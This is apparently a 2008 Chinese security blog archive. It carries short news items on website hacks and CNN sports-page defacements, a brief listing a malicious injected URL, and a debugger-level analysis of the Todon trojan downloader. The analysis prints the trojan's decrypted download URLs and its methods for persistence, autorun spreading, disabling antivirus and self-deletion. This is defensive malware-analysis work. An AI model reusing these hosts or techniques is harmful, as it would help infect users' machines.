大陆四川遭强震袭击,灾情惨重,各地慷慨解囊,不过中共公安证实,部分「红十字会」官方网站遭骇客非法入侵,不法份子擅自窜改网页上向民众募款的帐号,实施诈骗。有关当局已向各地紧急通报,呼吁民众提高警觉。
「宁波」银行监督局表示,他们在接获紧急通报之后,已经利用大众传播,公佈救灾捐款的专用帐号,并一再提醒民众汇款救灾时,一定要仔细核对帐号,或请银行柜檯人员协助核实。
来源:中广新闻网
Popularity: 16% [?]
知道创宇
我们提供更安全的互联网
This theme is downloaded from wordpress themes website.
Archive for the 'Default' Category
5月3日挂马简报
万人迷远程视频强制嗅探(http://www.gooton.cn/cf.asp?user_name=rzz123)插入恶意代码:http://fanduizd.cn/wmpu/1810.htm?5918
Popularity: 11% [?]
Default GreySign 03 May 2008 No Comments
CNN分站发布声明并且暂时关闭
发布日期:
Please Note
The Sports Network website and other major news sites have been hacked by a political entity from China, and as a result are temporarily unavailable. We apologize for any inconvenience and hope to be back up and running as soon as possible. Thank you for your patience and understanding.
Sports Network Management
根据这几天的关注,CNN的sports由于存在明显的注射漏洞,先后有很多人得到权限,对其页面进行涂改,而CNN网站的管理也在很短的时间内进行修复,一般没有超过20分钟,涂改页面就被恢复原状,但还是有一些黑客们留下了一些脚印和大名。
今天发现CNN的sports已经发布声明并且暂时关闭了,与这几天的侵入和涂改事件不无关系。
Popularity: 10% [?]
Default GreySign 21 Apr 2008 No Comments
CNN网站被中国黑客攻陷-直播
来自neeao同学的报道
2008-4-20 15:17
http://sports.si.cnn.com/
首页又黑客被修改。
——————————————
2008-4-20 14:50
黑页地址为:
http://sports.si.cnn.com/homehacked.asp
2008-04-20 14:22:17
http://sports.si.cnn.com/
引用
西藏过去是,现在是,以后也将永远是中国的一部分!
Tibet WAS,IS,and ALWAYS WILL BE a part of China!
我们并不反对媒体本身,我们只反对媒体的不客观报道。
We are not against the western media, but against the lies and fabricated stories in the media.
我们并不反对西方人民,但是我们反对偏见。
We are not against the western people, but against the prejudice from the western society.!
Popularity: 23% [?]
Default GreySign 20 Apr 2008 No Comments
标题保护器。
越来越多病毒喜欢监控窗口的标题来阻止用户运行特定的程序或者打开某类网站,假如你在搜索杀毒工具的时候窗口总是被莫名其妙地关闭,那很大的可能是中毒了。
很久以前写的一个小工具再次放出来:标题保护器。
可以选择自动更新当前窗口的速度,单位是毫秒。也可以直接修改所有窗口的标题。
这样就可以保护你的窗口标题不会被病毒识别。
帮助你对抗磁碟机等病毒。
下载地址:http://www.scanw.com/btbhq.exe
Popularity: 10% [?]
Default GreySign 21 Mar 2008 No Comments
About virus:Trojan-Downloader.Win32.Todon.aq
样本:http://www.scanw.com/blog/archives/77 —–解压说明.exe
;*****************************************************************************************
;**********************************thanks cyto******************************************
;*****************************************************************************************
1.OEP
OEP被改动过,EP:
004115A1 > $ 55 push ebp
004115A2 . 8BEC mov ebp,esp
004115A4 . 50 push eax
004115A5 . 58 pop eax
004115A6 . 90 nop
004115A7 . 90 nop
004115A8 . 41 inc ecx
004115A9 . 49 dec ecx
004115AA . 90 nop
004115AB . 90 nop
004115AC . 50 push eax
004115AD . 58 pop eax
004115AE . 90 nop
004115AF . 90 nop
004115B0 . 90 nop
004115B1 . 90 nop
004115B2 . EB 29 jmp short 解压说明.004115DD
再往下就是Borland Delphi的OEP特征:55 8B EC B9 34 00 00 00
004115B8 > /55 push ebp
004115B9 . |8BEC mov ebp,esp
004115BB . |B9 34000000 mov ecx,34
004115C0 .^|E9 8BEEFFFF jmp 解压说明.00410450
这里是foep:
00410450 > /6A 00 push 0 ; fOEP
00410452 . |6A 00 push 0
00410454 . |49 dec ecx
00410455 .^ 75 F9 jnz short 解压说明.00410450
00410457 . |51 push ecx
00410458 . |53 push ebx
可以看到前面8个字节被nop掉了,补上:
55 8B EC B9 34 00 00 00
修正.
2.解密字符串:004104C1 E8 8E7DFFFF call 解压说明.00408254
call 0040654C
堆栈 ss:[0012D578]=00C8290C, (ASCII “hxxp://www.webweb.com/ReadDown.txt”)
edx=00C828A8, (ASCII “mvqr?-*uru+u“rgg,fmh-WgdfAmrl+v}v”)
堆栈 ss:[0012D568]=00C829C0, (ASCII “hxxp://www.cbirds.cn/qqwww/uu.exe”)
edx=00C82970, (ASCII “mvqr?-*uru+agkwfv,fl*sturu*wp,`z`”)
堆栈 ss:[0012D560]=00C82A40, (ASCII “hxxp://www.cbirds.cn/qqwww/1.exe”)
edx=00C829F0, (ASCII “mvqr?-*uru+agkwfv,fl*sturu*3+g}g”)
堆栈 ss:[0012D558]=00C82AC0, (ASCII “hxxp://www.cbirds.cn/qqwww/2.exe”)
edx=00C82A70, (ASCII “mvqr?-*uru+agkwfv,fl*sturu*0+g}g”)
堆栈 ss:[0012D550]=00C82B40, (ASCII “hxxp://www.cbirds.cn/qqwww/3.exe”)
edx=00C82AF0, (ASCII “mvqr?-*uru+agkwfv,fl*sturu*1+g}g”)
堆栈 ss:[0012D520]=00C82D50, (ASCII “hxxp://www.cbirds.cn/qqwww/4.exe”)
edx=00C82CEC, (ASCII “mvqr?-*uru+agkwfv,fl*sturu*6+g}g”)
堆栈 ss:[0012D518]=00C82DE4, (ASCII “hxxp://www.cbirds.cn/qqwww/5.exe”)
edx=00C82D80, (ASCII “mvqr?-*uru+agkwfv,fl*sturu*7+g}g”)
3.运行中的进程名是否是:(GOODIYA.EXE)
00410518 8B55 E0 mov edx,dword ptr ss:[ebp-20]
0041051B 58 pop eax
0041051C E8 C338FFFF call 解压说明.00403DE4
00410521 0F85 A5010000 jnz 解压说明.004106CC
一个个分区来:
堆栈 ss:[0012FF98]=00C82FEC, (ASCII “C:\GOODIYA.EXE”)
…
堆栈 ss:[0012FF98]=00C8375C, (ASCII “Z:\GOODIYA.EXE”)
是的话就直接运行了.
4.比较进程是否是以下程序:
004107EB 8B55 88 mov edx,dword ptr ss:[ebp-78]
004107EE 58 pop eax
004107EF E8 F035FFFF call 解压说明.00403DE4
004107F4 0F84 16060000 je 解压说明.00410E10
C:\PROGRAM FILES\COMMON FILES\SYSTEM\PJNQBQE.EXE
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\MAUJQYF.EXE
不是的话就拷贝副本:
0012FDEC 00410CCD /CALL 到 CopyFileA 来自 解压说明.00410CC8
0012FDF0 00C80034 |ExistingFileName = “C:\Documents and Settings\gao1\桌面\解压说明.exe”
0012FDF4 00C80480 |NewFileName = “C:\Program Files\Common Files\System\pjnqbqe.exe”
0012FDF8 FFFFFFFF \FailIfExists = TRUE
0012FDEC 00410D17 /CALL 到 CopyFileA 来自 解压说明.00410D12
0012FDF0 00C80034 |ExistingFileName = “C:\Documents and Settings\gao1\桌面\解压说明.exe”
0012FDF4 00C80514 |NewFileName = “C:\Program Files\Common Files\Microsoft Shared\maujqyf.exe”
0012FDF8 FFFFFFFF \FailIfExists = TRUE
并执行:
0012FDF0 00410D54 /CALL 到 WinExec 来自 解压说明.00410D4F
0012FDF4 00C805A8 |CmdLine = “C:\Program Files\Common Files\System\pjnqbqe.exe”
0012FDF8 00000001 \ShowState = SW_SHOWNORMAL
0012FDF0 00410D91 /CALL 到 WinExec 来自 解压说明.00410D8C
0012FDF4 00C8063C |CmdLine = “C:\Program Files\Common Files\Microsoft Shared\maujqyf.exe”
0012FDF8 00000001 \ShowState = SW_SHOWNORMAL
删除自身:除根目录下的GOODIYA.EXE:
0012FCC8 00405FA9 /CALL 到 WinExec 来自 解压说明.00405FA4
0012FCCC 00C83D80 |CmdLine = “C:\WINNT\system32\cmd.exe /c del “C:\Documents and Settings\gao1\桌面\解压说明.exe”"
0012FCD0 00000000 \ShowState = SW_HIDE
5.PJNQBQE.EXE或MAUJQYF.EXE干的活:
5.1 如果是PJNQBQE.EXE:
0012FDE0 00411025 /CALL 到 CreateThread 来自 解压说明.00411020
0012FDE4 00000000 |pSecurity = NULL
0012FDE8 00000000 |StackSize = 0
0012FDEC 0040BDE0 |ThreadFunction = 解压说明.0040BDE0 ; 对付avp
0012FDF0 00000000 |pThreadParm = NULL
0012FDF4 00000000 |CreationFlags = 0
0012FDF8 004136DC \pThreadId = 解压说明.004136DC
0012FDE8 00411038 /CALL 到 SetTimer 来自 解压说明.00411033
0012FDEC 00000000 |hWnd = NULL
0012FDF0 00000000 |TimerID = 0
0012FDF4 00000514 |Timeout = 1300. ms
0012FDF8 0040FBC4 \Timerproc = 解压说明.0040FBC4 ; 写注册表
0040FDA4=解压说明.0040FDA4 (ASCII “Software\Microsoft\Windows\CurrentVersion\Run”)
0012FDE8 00411053 /CALL 到 SetTimer 来自 解压说明.0041104E
0012FDEC 00000000 |hWnd = NULL
0012FDF0 00000000 |TimerID = 0
0012FDF4 00001388 |Timeout = 5000. ms
0012FDF8 00410078 \Timerproc = 解压说明.00410078 ; 写autorun.inf及GOODIYA.EXE
0012FDE8 0041106E /CALL 到 SetTimer 来自 解压说明.00411069
0012FDEC 00000000 |hWnd = NULL
0012FDF0 00000000 |TimerID = 0
0012FDF4 00000898 |Timeout = 2200. ms
0012FDF8 00410090 \Timerproc = 解压说明.00410090 ; 过一堆的杀软
0012FDE8 004110A4 /CALL 到 SetTimer 来自 解压说明.0041109F
0012FDEC 00000000 |hWnd = NULL
0012FDF0 00000000 |TimerID = 0
0012FDF4 00000000 |Timeout = 0. ms
0012FDF8 0040B8E4 \Timerproc = 解压说明.0040B8E4 ; 下载病毒
5.2 如果是MAUJQYF.EXE的话:
004112EF A1 3C254100 mov eax,dword ptr ds:[41253C]
004112F4 50 push eax
004112F5 6A 00 push 0
004112F7 6A 00 push 0
004112F9 68 9CF34000 push 解压说明.0040F39C ; 过杀软
004112FE 6A 00 push 0
00411300 6A 00 push 0
00411302 E8 B533FFFF call <jmp.&kernel32.CreateThread>
00411307 A1 44254100 mov eax,dword ptr ds:[412544]
0041130C 50 push eax
0041130D 6A 00 push 0
0041130F 6A 00 push 0
00411311 68 04B24000 push 解压说明.0040B204 ; 下载文件,运行后再删除
00411316 6A 00 push 0
00411318 6A 00 push 0
0041131A E8 9D33FFFF call <jmp.&kernel32.CreateThread>
上面解密的地址一个个下载,如下:
011DFF60 00C84050 ASCII “hxxp://www.cbirds.cn/qqwww/uu.exe”
011DFF64 00C80210 ASCII “C:\Program Files\1Awww.cbirds.cn/qqwww/uu.exe”
0041131F 68 28FE4000 push 解压说明.0040FE28 ; 执行PJNQBQE.EXE,关闭taskmgr.exe窗口
00411324 68 14050000 push 514
00411329 6A 00 push 0
0041132B 6A 00 push 0
0041132D E8 FA34FFFF call <jmp.&user32.SetTimer>
00411332 8B15 40254100 mov edx,dword ptr ds:[412540] ; 解压说明.00413ED0
00411338 8902 mov dword ptr ds:[edx],eax
0041133A 68 6C004100 push 解压说明.0041006C ; 各分区写入autorun.inf及GOODIYA.EXE
0041133F 68 70170000 push 1770
00411344 6A 00 push 0
00411346 6A 00 push 0
00411348 E8 DF34FFFF call <jmp.&user32.SetTimer>
0041134D 8B15 50254100 mov edx,dword ptr ds:[412550] ; 解压说明.00413ED4
00411353 8902 mov dword ptr ds:[edx],eax
00411355 68 60034100 push 解压说明.00410360 ; 过杀软
0041135A 68 E8030000 push 3E8
0041135F 6A 00 push 0
00411361 6A 00 push 0
00411363 E8 C434FFFF call <jmp.&user32.SetTimer>
Popularity: 7% [?]
Recommended: Buy movies online.
